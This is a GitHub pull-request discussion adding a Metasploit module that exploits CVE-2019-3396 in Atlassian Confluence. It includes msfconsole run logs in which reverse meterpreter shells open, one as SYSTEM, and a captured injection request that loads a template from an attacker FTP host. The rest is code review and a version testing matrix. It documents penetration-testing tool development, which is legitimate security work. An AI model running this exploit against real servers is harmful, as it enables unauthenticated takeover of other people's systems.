Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Atlassian Confluence RCE exploit (CVE-2019-3396) #11717

Merged
merged 14 commits into from Apr 18, 2019

Conversation

Projects
None yet
6 participants
@rrockru
Copy link
Contributor

commented Apr 12, 2019

Description

This module exploits a Velocity Template Injection in Atlassian Confluence Widget Connector Macro before 6.14.2 to execute arbitrary code (CVE-2019-3396). No authentication is required to exploit this vulnerability.

The vulnerability exists in the Widget Connector Macro which allow inject the "_template" from the outside for some services, such as Youtube, Viddler, DailyMotion, etc.

The module has been tested with on Atlassian Confluence 6.6.12, 6.8.2, 6.12.0 and 6.13.0 using Java, Windows and Linux meterpreter payload.

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3396
https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html

Vulnerable Application

Affecting Atlassian Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2.

Verification Steps

List the steps needed to make sure this thing works

  • Setting up a working installation of Atlassian Confluence before 6.6.13, 6.12.3, 6.12.3 or 6.14.2.
  • Start msfconsole
  • use exploit/multi/http/confluence_widget_connector
  • set RHOST <IP>
  • set RPORT <PORT>
  • set SRVHOST <HOST_IP>
  • check
  • You should see The target is vulnerable
  • exploit
  • You should get a meterpreter session.

Options

Scenario

Tested on Confluence 6.8.2 with Windows target

msf5 > use exploit/multi/http/confluence_widget_connector
msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
RHOST => target.com
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
RPORT => 8090
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf5 exploit(multi/http/confluence_widget_connector) > set TARGET Windows
TARGET => Windows
msf5 exploit(multi/http/confluence_widget_connector) > check
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
msf5 exploit(multi/http/confluence_widget_connector) >
[*] target.com:8090 - Target being detected as: Windows 10
[*] target.com:8090 - Attempting to upload C:\PROGRA~1\Atlassian\Confluence\temp\gAdGh.exe
[*] target.com:8090 - Attempting to copy payload to C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe
[*] target.com:8090 - Attempting to execute C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe
[*] Sending stage (179779 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:62528) at 2019-04-11 03:13:37 +0000
[*] target.com:8090 - Waiting for exploit to complete...
[!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\FFDBo.exe' on the target
[!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\JLzIZ.exe' on the target
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > quit
[*] Shutting down Meterpreter...

[*] target.com - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/http/confluence_widget_connector) >

Tested on Confluence 6.8.2 with Java target

msf5 > use exploit/multi/http/confluence_widget_connector
msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
RHOST => target.com
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
RPORT => 8090
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf5 exploit(multi/http/confluence_widget_connector) > check
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
msf5 exploit(multi/http/confluence_widget_connector) >
[*] target.com:8090 - Target being detected as: Linux
[*] target.com:8090 - Attempting to upload  /opt/atlassian/confluence/temp/EjpPf.jar
[*] target.com:8090 - Attempting to execute  /opt/atlassian/confluence/temp/EjpPf.jar
[*] Sending stage (53866 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:55690) at 2019-04-11 03:13:37 +0000
[+] target.com:8090 -Deleted /opt/atlassian/confluence/temp/EjpPf.jar
[*] target.com:8090 - Waiting for exploit to complete...
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: confluence
meterpreter > quit
[*] Shutting down Meterpreter...

[*] target.com - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/http/confluence_widget_connector) >

Tested on Confluence 6.8.2 with Linux target

msf5 > use exploit/multi/http/confluence_widget_connector
msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
RHOST => target.com
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
RPORT => 8090
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf5 exploit(multi/http/confluence_widget_connector) > check
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
msf5 exploit(multi/http/confluence_widget_connector) >
[*] target.com:8090 - Target being detected as: Linux
[*] target.com:8090 - Attempting to upload /opt/atlassian/confluence/temp/BYHzD
[*] target.com:8090 - Attempting to copy payload to /opt/atlassian/confluence/temp/dESMnt
[*] target.com:8090 - Attempting to execute /opt/atlassian/confluence/temp/dESMnt
[*] Sending stage (985320 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:55690) at 2019-04-11 03:13:37 +0000
[+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/BYHzD
[+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/dESMnt
[*] target.com:8090 - Waiting for exploit to complete...
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=1001, gid=1001, euid=1001, egid=1001
meterpreter > quit
[*] Shutting down Meterpreter...

[*] target.com - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/http/confluence_widget_connector) >

rrockru added some commits Apr 11, 2019

@rrockru

This comment has been minimized.

Copy link
Contributor Author

commented Apr 12, 2019

Recreated pull request #11711 from a unique branch.

Show resolved Hide resolved modules/exploits/multi/http/confluence_widget_connector.rb Outdated
Show resolved Hide resolved modules/exploits/multi/http/confluence_widget_connector.rb Outdated
# Returns a upload template.
#
# @return [String]
def get_upload_vm()

This comment has been minimized.

Copy link
@bcoles

bcoles Apr 12, 2019

Contributor

Empty braces for method definitions, as used here, and elsewhere in this module, are unnecessary. They may also be considered bad style, and will raise Rubocop warnings.

This comment has been minimized.

Copy link
@rrockru

rrockru Apr 12, 2019

Author Contributor

Removed.

Show resolved Hide resolved modules/exploits/multi/http/confluence_widget_connector.rb Outdated
Show resolved Hide resolved modules/exploits/multi/http/confluence_widget_connector.rb Outdated
java_home = get_java_home_path

if java_home.blank?
fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')

This comment has been minimized.

Copy link
@bcoles

bcoles Apr 12, 2019

Contributor

Would it be worth making this a user-configurable option?

This comment has been minimized.

Copy link
@rrockru

rrockru Apr 12, 2019

Author Contributor

I don't think it be worth making this a user-configurable option, as this path depends on Confluence installation path, because JRE is part of Confluence package. As well as temp folder path.

Show resolved Hide resolved modules/exploits/multi/http/confluence_widget_connector.rb Outdated

rrockru added some commits Apr 12, 2019

@asoto-r7 asoto-r7 self-assigned this Apr 12, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 12, 2019

This is in @asoto-r7's very capable hands now! Thanks!

@asoto-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 12, 2019

Hi @rrockru, thanks for the module!

I've set up fresh Confluence test environments in both Linux (Ubuntu Desktop 16.04.6 LTS x64) and Windows (Win10 x64), but am having trouble getting the check or exploit methods to succeed. Let me walk through my steps and you can tell me where I'm going wrong.

  1. I'm downloading a Confluence trial from their website. Since you mentioned version 6.13.0, I started there, but I'll try others as well. I'm using the Windows 64-bit installer and the Linux 64-bit installer.
  2. I'm running the executable (using sudo on Linux), and running through the express installation.
  3. I registered a throwaway account and received an evaluation license key.
  4. I logged into the admin panel and clicked "Manage Apps" (http://localhost:8090/plugins/servlet/upm/manage/all). I confirmed that the "Widget Connector" is installed and activated. It came with version 3.1.2.
  5. I fired up your latest commit and launched a check:
msf5 exploit(multi/http/confluence_widget_connector) > set RHOSTS 192.168.199.152
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.199.148 
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
msf5 exploit(multi/http/confluence_widget_connector) > check

[*] Starting the FTP server.
[*] Started service listener on 192.168.199.148:8021 
[-] Failed to inject and execute code:
[*] 192.168.199.152:8090 - The target is not exploitable.
[*] Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > set TARGET Windows 
msf5 exploit(multi/http/confluence_widget_connector) > check

[*] Starting the FTP server.
[*] Started service listener on 192.168.199.148:8021 
[-] Failed to inject and execute code:
[*] 192.168.199.152:8090 - The target is not exploitable.
[*] Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > run

[-] Exploit failed: java/meterpreter/reverse_tcp is not a compatible payload.
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
  1. Looking at the packet capture, the check is successfully reaching the host and receiving back an HTTP code 200. Two things might be odd with the response, so I'll include the headers (skipping a bunch of cruft in the middle) along with the tail end of the response:
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: 192.168.199.152:8090
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Accept: */*
Origin: http://192.168.199.152:8090/
Content-Type: application/json; charset=UTF-8
Content-Length: 171

{"contentId":"1","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=dQw4w9WgXcQ","_template":"ftp://192.168.199.148:8021/uIzmacheck.vm"}}}
HTTP/1.1 200 
X-ASEN: SEN-L13440750
Set-Cookie: JSESSIONID=14628894E105A29F025C266F1D79B013; Path=/; HttpOnly
X-Content-Type-Options: nosniff
Content-Type: text/plain
Transfer-Encoding: chunked
Date: Fri, 12 Apr 2019 20:31:13 GMT

2000
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
    <title>Preview Macro</title>

        
        
                        
    
            <meta http-equiv="X-UA-Compatible" content="IE=EDGE,chrome=IE7">
<meta charset="UTF-8">
<meta id="confluence-context-path" name="confluence-context-path" content="">
<meta id="confluence-base-url" name="confluence-base-url" content="http://localhost:8090">

<meta id="atlassian-token" name="atlassian-token" content="544b58a7fb1b29b248133607d2af9489ea011e2d">


[...]

</style>

<div class="widget-error">
    <span class="widget-link">www.youtube.com</span>
</div>

            </div>
        </div>
    </div>
        <!-- include system javascript resources -->
    
    

    <!-- end system javascript resources -->
</body>
</html>

0


Note the final few lines include a widget-error section which simply reads www.youtoube.com. Additionally, there is a dangling 0 with some newlines at the end.

Looking at the packet capture, I see no attempt for the Confluence target to reach back to the attacker via the specified port 8021:

image

A few questions:

  • Do any of my verification steps look different from your setup?
  • Could you let me know if you see the widget-error or the dangling zero?
  • Should we set the default port to 8090, since that's the Confluence installed default, or leave it as 80, assuming it'll be externally accessible?

Thanks again for the module! I'm looking forward to landing it!

@rrockru

This comment has been minimized.

Copy link
Contributor Author

commented Apr 13, 2019

Hi @asoto-r7 . After analyzing problem I found that servers that I used to check are use Confluence based on Tomcat 8.0. It's strange, because fresh install of Confluence based on Tomcat 9.0 and I have same problem with exploitation. Also I found that Tomcat was updated with Confulence version 6.10. I will try to bypass that limitation. But it seems that presently exploit works only before Confulence v6.10.

@rrockru

This comment has been minimized.

Copy link
Contributor Author

commented Apr 13, 2019

Hmmm... It's very strange. Module works fine with Confluence 6.10 and 6.11. Seems like problem somewhere else.

@asoto-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 16, 2019

@haydar68 : The exploit has not yet been integrated into the Framework, and there will be a delay before you'll see it in Kali. This forum is for development and contributor efforts only, but feel free to reach out to us on the Metasploit Slack and we'll walk you through getting it set up in advance:

http://metasploit.com/slack

@asoto-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 16, 2019

@rrockru: Thanks for the feedback. There are a few things I'd like to see; not all of these are required before we can land the module. I'll keep working on this myself as well, but feel free to knock any of these out as well.

It would be nice to:

  • Figure out why the module doesn't work on newer versions of Confluence

We definitely need to:

  • Clearly define which versions the module will work on by default
  • Move the .md documentation file to documentation/exploits/multi/http
  • Cleanup previous listeners, so the exploit can be run multiple times sequentially
  • Determine why some exploits fail with bad-config (see below)
msf5 exploit(multi/http/confluence_widget_connector) > set RHOSTS 192.168.199.152
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.199.148
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
msf5 exploit(multi/http/confluence_widget_connector) > set TARGET Windows
msf5 exploit(multi/http/confluence_widget_connector) > set PAYLOAD windows/meterpreter/reverse_tcp

msf5 exploit(multi/http/confluence_widget_connector) > check
[*] Starting the FTP server.
[*] Started service listener on 192.168.199.148:8021
[+] 192.168.199.152:8090 - The target is vulnerable.
[*] Server stopped.

msf5 exploit(multi/http/confluence_widget_connector) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.199.148:4444
[*] Starting the FTP server.
[*] Started service listener on 192.168.199.148:8021

msf5 exploit(multi/http/confluence_widget_connector) > [*] Target being detected as: Windows 10
[-] Exploit aborted due to failure: bad-config: Selected module target does not match the actual target.
[*] Server stopped.

EDIT: I was able to fix the bad-config exception by modifying the way the target_platform_compat method checks for operating system matching. I've tested this for Windows 10, but will need to confirm that it also works for Linux and Java.

asoto-r7 added some commits Apr 16, 2019

@asoto-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 16, 2019

A few bugs I'm working through....

Misleading "connection timed out" messages

When a target refuses the connection (e.g. when specifying an invalid RPORT), the exploit reports that the connection timed out, which is unexpected:

[!] Connection timed out in #inject_template

nil response from get_target_platform

get_target_platform can return nil, which generates an exception. I'm not yet sure what triggers this condition, but we'll want to abort if it happens.

[-] Exploit failed: NoMethodError undefined method `downcase' for nil:NilClass                                                                                                                                                                                                  
[*] Server stopped.                                                                                                                                                                                                                                                             
[*] Exploit completed, but no session was created.                                                                                                                                                                                                                              

I'm able to reproduce this in my Linux testing environment (Ubuntu Desktop 16.04 x64 with Confluence 6.6.11 running natively). The call to send_request_cgi within inject_template when querying the os.name via javaprop.vm is returning a nil object. I've seen this when the server returns an HTTP/503 Service Unavailable (for example, when Confluence hasn't been fully set up) and also when the RPORT isn't listening.

Incoming flood of Meterpreter connections

While debugging under repeated runs, I've noticed instances where I start getting a ton of callbacks on port 4444. This could easily be an issue with my testing environment, but I want to note it here in case anyone else sees the same thing:

msf5 exploit(multi/http/confluence_widget_connector) > rerun                                                                                                                                                                                                                    
[*] Reloading module...                                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                                
[*] Started reverse TCP handler on 192.168.199.162:4444                                                                                                                                                                                                                         
[*] Starting the FTP server.                                                                                                                                                                                                                                                    
[*] Started service listener on 192.168.199.162:8021                                                                                                                                                                                                                            
[*] timeout = 20                                                                                                                                                                                                                                                                
[*] Target being detected as:                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                              
[*] Meterpreter session 1 opened (192.168.199.162:4444 -> 192.168.199.152:54716) at 2019-04-16 14:53:45 -0500                                                                    
[*] Sending stage (985320 bytes) to 192.168.199.152                                                                                                                                                                                                                             
[*] Meterpreter session 2 opened (192.168.199.162:4444 -> 192.168.199.152:54714) at 2019-04-16 14:53:46 -0500                                                                                                                                                                   
[*] Sending stage (985320 bytes) to 192.168.199.152                                                                                                                                                                                                                             
[*] Meterpreter session 3 opened (192.168.199.162:4444 -> 192.168.199.152:54715) at 2019-04-16 14:53:46 -0500                                                                                                                                                                   
[*] Meterpreter session 4 opened (192.168.199.162:4444 -> 192.168.199.152:57272) at 2019-04-16 14:53:47 -0500                                                                    
[*] Sending stage (985320 bytes) to 192.168.199.152                                                                                                                                                                                                                             
[*] Meterpreter session 5 opened (192.168.199.162:4444 -> 192.168.199.152:54717) at 2019-04-16 14:53:47 -0500                                                                                                                                                                   
[*] Sending stage (985320 bytes) to 192.168.199.152                                                                                                                                                                                                                             
[*] Meterpreter session 6 opened (192.168.199.162:4444 -> 192.168.199.152:57273) at 2019-04-16 14:53:47 -0500                                                                                                                                                                   
[*] Sending stage (985320 bytes) to 192.168.199.152                                                                                                                                                                                                                             
[*] Meterpreter session 7 opened (192.168.199.162:4444 -> 192.168.199.152:57274) at 2019-04-16 14:53:48 -0500                                                                                                                                                                   
[*] Sending stage (985320 bytes) to 192.168.199.152                                                                                                                                                                                                                             
[*] Meterpreter session 8 opened (192.168.199.162:4444 -> 192.168.199.152:57275) at 2019-04-16 14:53:48 -0500                                                                                                                                                                   
[*] Sending stage (985320 bytes) to 192.168.199.152                                                                                                                                                                                                                             
[*] Meterpreter session 9 opened (192.168.199.162:4444 -> 192.168.199.152:57276) at 2019-04-16 14:53:48 -0500                                                                                                                                                                   
[*] Sending stage (985320 bytes) to 192.168.199.152                                                                                                                                                                                                                             

It's possible (and even likely) that these are old payloads from previous attempts that are trying to re-establish connections. I'm not sure what we can do about this, but one significantly negative side effect is that these payloads are written to disk and don't seem like they can be cleaned up until the service restarts.

Testing status

Tested successfully on:
(EDIT: see my comment below)

@rrockru

This comment has been minimized.

Copy link
Contributor Author

commented Apr 17, 2019

@asoto-r7 Thanks for your fixes. I'll use your recommendations in the future.

  • Figure out why the module doesn't work on newer versions of Confluence

Right now I try to determine what the problem. I see that vulnerability triggers on Confluence 6.12 and above, but in the logs I see some problem with fetching resource from the URL. It's behaviour is the same for FTP and HTTPS resources. After some research I found that Tomcat's ParallelWebappClassLoader class unable to find resource by url using WebappClassLoaderBase's function findResource(). This function always returns null.

@rrockru

This comment has been minimized.

Copy link
Contributor Author

commented Apr 17, 2019

Confluence 6.12.0 on Ubuntu 16.04 x64 also works with both Linux and Java payload.

@rrockru

This comment has been minimized.

Copy link
Contributor Author

commented Apr 17, 2019

Finally found the problem, as i think. In Confluence 6.12 and below used Apache Felix Framework 4.2.1, which registers additional loader named http://felix.extensions:9/ to ClasspathResourceLoader. This loader allows to work with external schemas like ftp://, https://, etc. In Confluence 6.13 and above Apache Felix Framework is upgraded to version 5.6.10, which doesn't register loader. And that is reason why exploit doesn't work with Confulence 6.13 and above.

@busterb

This comment has been minimized.

Copy link
Member

commented Apr 17, 2019

Thanks, that's a reasonable explanation.

@asoto-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 18, 2019

Awesome. Thanks @rrockru for the follow up explanation. Supposedly later versions are vulnerable, but they may not be exploitable. In any event, let's get this landed.

Testing Status

According to the CVE, this affects Confluence versions:

  • from 6.0.0 before 6.6.12,
  • from 6.7.0 before 6.12.3,
  • from 6.13.0 before 6.13.3, and
  • from 6.14.0 before 6.14.2.

In my testing, the exploit works reliably and stably against:

  • Confluence 6.6.11 (native Windows)
  • Confluence 6.0.1 (native Linux)
  • Confluence 6.2.0 (native Linux)
  • Confluence 6.3.1 (native Linux)
  • Confluence 6.4.0 (native Linux)
  • Confluence 6.5.0 (native Linux)
  • Confluence 6.6.0 (native Linux)
  • Confluence 6.6.11 (native Linux)
  • Confluence 6.7.0 (native Linux)
  • Confluence 6.7.1 (native Linux)
  • Confluence 6.7.3 (native Linux)
  • Confluence 6.8.0 (native Linux)
  • Confluence 6.8.5 (native Linux)
  • Confluence 6.9.0 (native Linux)
  • Confluence 6.9.3 (native Linux)
  • Confluence 6.10.0 (native Linux)
  • Confluence 6.10.2 (native Linux)
  • Confluence 6.11.0 (native Linux)
  • Confluence 6.11.2 (native Linux)
  • Confluence 6.12.0 (native Linux)
  • Confluence 6.12.0 (native Windows)
  • Confluence 6.12.2 (native Linux)

Exploit failed gracefully on non-vulnerable versions. The check says not exploitable and the exploit fails gracefully.

  • Confluence 6.12.3 (native Linux)
  • Confluence 6.12.3 (native Windows)
  • Confluence 6.12.4 (native Windows)
  • Confluence 6.13.3 (native Linux)
  • Confluence 6.13.3 (native Windows)
  • Confluence 6.13.4 (native Linux)
  • Confluence 6.13.4 (native Windows)
  • Confluence 6.14.2 (native Linux)
  • Confluence 6.14.2 (native Windows)
  • Confluence 6.14.3 (native Linux)
  • Confluence 6.15.2 (native Windows)

Exploit fails on some versions that should be vulnerable. The check says not exploitable and the exploit fails gracefully, but it should be vulnerable:

  • Confluence 6.13.0 (native Windows)
  • Confluence 6.13.0 (native Linux)
  • Confluence 6.13.1 (native Linux)
  • Confluence 6.13.2 (native Linux)
  • Confluence 6.14.0 (native Windows)
  • Confluence 6.14.0 (native Linux)
  • Confluence 6.14.1 (native Linux)

@asoto-r7 asoto-r7 merged commit 06792f7 into rapid7:master Apr 18, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

asoto-r7 added a commit that referenced this pull request Apr 18, 2019

msjenkins-r7 added a commit that referenced this pull request Apr 18, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 18, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 18, 2019

Release Notes

The multi/http/confluence_widget_connector exploit module has been added to the framework. This module exploits a Velocity Template Injection in Atlassian Confluence Widget Connector Macro to execute arbitrary code (CVE-2019-3396). It affects Atlassian Confluence versions 6.0.0 before 6.6.12,
from 6.7.0 before 6.12.3, from 6.13.0 before 6.13.3, and from 6.14.0 before 6.14.2. No authentication is required to exploit this vulnerability.

@rrockru

This comment has been minimized.

Copy link
Contributor Author

commented Apr 18, 2019

Awesome! Thanks, guys!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.